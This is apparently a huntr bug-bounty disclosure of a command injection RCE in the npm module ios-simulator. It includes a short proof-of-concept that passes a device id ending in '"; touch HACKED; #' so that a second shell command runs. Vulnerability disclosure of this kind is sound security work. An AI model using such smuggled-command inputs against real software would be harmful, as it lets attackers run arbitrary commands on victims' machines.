ios-simulator
huntr - RCE via insecure command formatting (Command Injection)
This issue has been generated on behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Details
I would like to report an RCE issue in the ios-simulator module.
It allows executing arbitrary commands remotely on the victim's PC.
Vulnerability Description
The issue occurs because user input is formatted inside a command that is then executed without any check. The issue arises here: https://github.com/macacajs/ios-simulator/blob/master/lib/ios-simulator.js#L50
Steps To Reproduce:
- Create the following PoC file:

```javascript
// poc.js
var ios = require('ios-simulator');
// The device id is later formatted into a shell command string without escaping,
// so the closing quote, ';' and '#' below change the command the shell runs.
ios.prototype.setDeviceId('test"; touch HACKED; #');
ios.prototype.install();
```

- Check there aren't files called HACKED
- Execute the following commands in another terminal:

```shell
npm i ios-simulator # Install affected module
node poc.js # Run the PoC
```

- Recheck the files: now HACKED has been created :)
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/